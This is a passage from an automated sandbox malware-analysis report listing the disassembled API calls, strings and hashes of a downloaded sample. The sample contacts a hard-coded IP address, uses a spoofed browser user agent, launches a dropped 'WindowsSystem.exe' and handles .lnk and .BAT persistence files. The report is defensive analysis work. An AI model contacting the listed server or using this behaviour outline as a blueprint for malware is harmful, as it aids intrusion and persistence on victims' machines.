                                                                                                            • CloseHandle.KERNEL32(000002EC), ref: 0031BE8F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031BE9F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031BEC6
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031BED6
                                                                                                            • ExitProcess.KERNEL32 ref: 0031BEE7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                                                            • String ID: KERNEL32.DLL${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 2953619224-1144826392
                                                                                                            • Opcode ID: 6d0df5066db99bbfa826566ad9de00aa9d1a80acf1d84bfa3617d5351dd9e1cb
                                                                                                            • Instruction ID: 90f6fdd6ae6e4072f1f38e87b052713cd85742537835ff1a06a9e4e840afa8c9
                                                                                                            • Opcode Fuzzy Hash: 6d0df5066db99bbfa826566ad9de00aa9d1a80acf1d84bfa3617d5351dd9e1cb
                                                                                                            • Instruction Fuzzy Hash: 77A16D70904308EFDB2FAFA5ED997EEB6B8BB08715F104119F615A6290DB7449C4CF22
                                                                                                            APIs
                                                                                                              • Part of subcall function 00321EA0: lstrcpyA.KERNEL32(0037D4C0,185.157.162.216), ref: 00321EF4
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032117D
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211A0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003211B8
                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 0032126B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00321281
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 00321298
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321580,00000000,00000000,00000000), ref: 003212C4
                                                                                                            • GetTickCount.KERNEL32 ref: 003212E1
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321309
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321323
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032133E
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 003213D7
                                                                                                            • closesocket.WS2_32(00000000), ref: 003213E1
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003213F2
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003213FE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321419
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00321430
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032143A
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321453
                                                                                                            • closesocket.WS2_32(00000000), ref: 0032145D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321469
                                                                                                            • ExitProcess.KERNEL32 ref: 003214B0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003214C6
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003214D7
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003214E8
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003214F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321504
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032151B
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2113405211-0
                                                                                                            • Opcode ID: 52593a43761b2bfeb4c4af2bc3bafd78477e771791978a8e50038ead8aac305c
                                                                                                            • Instruction ID: 1c0ddf2fecc4f17f628b07255c957b7bec0d10d20c81a7dd2f318d549461f16d
                                                                                                            • Opcode Fuzzy Hash: 52593a43761b2bfeb4c4af2bc3bafd78477e771791978a8e50038ead8aac305c
                                                                                                            • Instruction Fuzzy Hash: F9714374900214EFDB2ADFA4EE8DBAE7779BF58701F208514F606A62E0C7789984CF50
                                                                                                            APIs
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{B189748B-D39F-48B3-A389-0325B737C49A}), ref: 00312F3F
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00312F5B
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00312F68
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}), ref: 00312F84
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00312FA2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00312FAF
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312FC5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312FDA
                                                                                                            • __snwprintf.LIBCMT ref: 0031301F
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0031302E
                                                                                                            • _memset.LIBCMT ref: 0031306A
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 003130A5
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 003130C2
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 003130E2
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003130F1
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003130FE
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031312E
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000000,00000000), ref: 00313147
                                                                                                            Strings
                                                                                                            • Software\%s, xrefs: 0031311D
                                                                                                            • {37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}, xrefs: 00312F78
                                                                                                            • {54A93AF2-DD4B-4995-A4AC-B7CC5F84077D}, xrefs: 00313002
                                                                                                            • %s\%s, xrefs: 0031300E
                                                                                                            • {B189748B-D39F-48B3-A389-0325B737C49A}, xrefs: 00312F33
                                                                                                            • {D3D2D73B-80E1-4BE8-8EAF-E74D52FB5827}, xrefs: 00313118
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWait__snwprintf_memsetlstrlenwnsprintf
                                                                                                            • String ID: %s\%s$Software\%s${37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}${54A93AF2-DD4B-4995-A4AC-B7CC5F84077D}${B189748B-D39F-48B3-A389-0325B737C49A}${D3D2D73B-80E1-4BE8-8EAF-E74D52FB5827}
                                                                                                            • API String ID: 1130256755-467414241
                                                                                                            • Opcode ID: 7d58d21c2fc157f0a7aee5c6822d769fa45cdc0cc5edd0c410375fc8ca1a62c9
                                                                                                            • Instruction ID: 142020ffc81b3a98890ae37f5c998b02e1a13d12dfa9357994e7ccf4f07df2e5
                                                                                                            • Opcode Fuzzy Hash: 7d58d21c2fc157f0a7aee5c6822d769fa45cdc0cc5edd0c410375fc8ca1a62c9
                                                                                                            • Instruction Fuzzy Hash: 98517C70E082589BDB769B20CC49BE977B8FF0C700F0081DAE50DA6290DBB86AC4CF51
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0031B654
                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0031B678
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031B928
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B93D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B95D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B97D
                                                                                                            Strings
                                                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 0031B6C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$Create$EventFreeLocalMutex
                                                                                                            • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                                                            • API String ID: 4059844998-3593534564
                                                                                                            • Opcode ID: 3b5ff18b5b889cd29604c13ad9799b75b1e4a91450a84ca3d72ff26da25f8350
                                                                                                            • Instruction ID: 69420755ad8f8e33b7caccb786546ac6f50adf9a413db0837a82e7d530d34c27
                                                                                                            • Opcode Fuzzy Hash: 3b5ff18b5b889cd29604c13ad9799b75b1e4a91450a84ca3d72ff26da25f8350
                                                                                                            • Instruction Fuzzy Hash: 90914074A00314DFE72BDF64DD89BAAB7BDBF48701F148159E6096A2A0C7745AC4CF12
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00326189), ref: 0032830F
                                                                                                            • __mtterm.LIBCMT ref: 0032831B
                                                                                                              • Part of subcall function 00328054: DecodePointer.KERNEL32(00000004,0032847D,?,00326189), ref: 00328065
                                                                                                              • Part of subcall function 00328054: TlsFree.KERNEL32(00000003,0032847D,?,00326189), ref: 0032807F
                                                                                                              • Part of subcall function 00328054: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,0032847D,?,00326189), ref: 0032C612
                                                                                                              • Part of subcall function 00328054: _free.LIBCMT ref: 0032C615
                                                                                                              • Part of subcall function 00328054: DeleteCriticalSection.KERNEL32(00000003,76EF5810,?,0032847D,?,00326189), ref: 0032C63C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00328331
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0032833E
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0032834B
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00328358
                                                                                                            • TlsAlloc.KERNEL32(?,00326189), ref: 003283A8
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,00326189), ref: 003283C3
                                                                                                            • __init_pointers.LIBCMT ref: 003283CD
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283DE
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283EB
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283F8
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 00328405
                                                                                                            • DecodePointer.KERNEL32(003281D8,?,00326189), ref: 00328426
                                                                                                            • __calloc_crt.LIBCMT ref: 0032843B
                                                                                                            • DecodePointer.KERNEL32(00000000,?,00326189), ref: 00328455
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00328467
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                            • Opcode ID: ac57b548ad6b1d06d4f8689b08c3dc3d2d79d20a3bcd9bb33fc8c237e301460c
                                                                                                            • Instruction ID: a2e28c8b57849f279c87b47c21b731166947f7377b09c3b5cecbe7318c1a6ae2
                                                                                                            • Opcode Fuzzy Hash: ac57b548ad6b1d06d4f8689b08c3dc3d2d79d20a3bcd9bb33fc8c237e301460c
                                                                                                            • Instruction Fuzzy Hash: B4315AB59063219BC733AF75BC49A5A3BB8AF44760F61462AE50C972B0DF749481CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $o3Xo3$$o3Xo3$<$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$Xo3
                                                                                                            • API String ID: 0-914312535
                                                                                                            • Opcode ID: 2fccb9d8600250c57c48b926a7e796306cc1575472bfc2bbca637b5c017fea35
                                                                                                            • Instruction ID: 71660cb7a7b785a3133f7e8fc6e5abeafcf593abf6a4f4fad8b9fac96b7822a9
                                                                                                            • Opcode Fuzzy Hash: 2fccb9d8600250c57c48b926a7e796306cc1575472bfc2bbca637b5c017fea35
                                                                                                            • Instruction Fuzzy Hash: B9C10C70A00218EFDB65CFA4DC89BDEBBB9BF48305F108559E609AB280D77459C4CF51
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312952
                                                                                                            • __snwprintf.LIBCMT ref: 0031297C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031298B
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 003129A9
                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 003129BF
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003129D4
                                                                                                            • __snwprintf.LIBCMT ref: 00312A03
                                                                                                            • _memset.LIBCMT ref: 00312A13
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00312A3E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A4D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A57
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A61
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A6B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A7C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A86
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A90
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$__snwprintflstrlen$CreateFileFolderKnownModuleNamePathProcessTask_memsetlstrcmpi
                                                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsSystem.exe${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}
                                                                                                            • API String ID: 2642993909-1205724815
                                                                                                            • Opcode ID: 2a15b51a5c1898d805204e7036c82a480ec709050deb3066dc7684be791f9fe1
                                                                                                            • Instruction ID: a133ccf58657d4fc1e582e3e47729223367212c66f171bb49d5db02d0d286b9d
                                                                                                            • Opcode Fuzzy Hash: 2a15b51a5c1898d805204e7036c82a480ec709050deb3066dc7684be791f9fe1
                                                                                                            • Instruction Fuzzy Hash: AF416275A50205ABD735DBE4DC49FFEBB79AF48701F104528F609AA190DB749A80CB60
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,00315BA8), ref: 0031317A
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 00313196
                                                                                                            • __snwprintf.LIBCMT ref: 003131B7
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 003131C3
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003131CD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003131D7
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003131EA
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003131FF
                                                                                                            • __snwprintf.LIBCMT ref: 00313229
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313238
                                                                                                            • __snwprintf.LIBCMT ref: 00313263
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0031326F
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 00313279
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00313283
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031328D
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00313297
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc__snwprintf$DeleteFileFolderKnownPathTask$DirectoryRemove
                                                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${18925F49-C14F-4A5B-BA0F-9C4106DA4CB0}${9771290C-19FB-4434-8B1F-8952BA10F287}${A786AA22-8EF1-44CE-8698-6F3988CB643E}
                                                                                                            • API String ID: 1689349194-2992477535
                                                                                                            • Opcode ID: 8af4a9881c6af874fac3f47403e65f13032b72895fdc5414c703560e06f8b1e7
                                                                                                            • Instruction ID: 85965c07551038cdca95598a168fd5c7961bd01348c4bfbebb452303f026ad93
                                                                                                            • Opcode Fuzzy Hash: 8af4a9881c6af874fac3f47403e65f13032b72895fdc5414c703560e06f8b1e7
                                                                                                            • Instruction Fuzzy Hash: E1318474A40305FBD726EBA4DC4AFBE7779AF48701F104528F609AA2D0D6749A80CB60
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030E187
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E1D8
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030E1E5
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030E242
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030E252
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030E284
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030E2CB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2DE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2EB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2F8
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030E30A
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E31D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030E327
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030E333
                                                                                                            • closesocket.WS2_32(?), ref: 0030E33D
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            Memory Dump Source
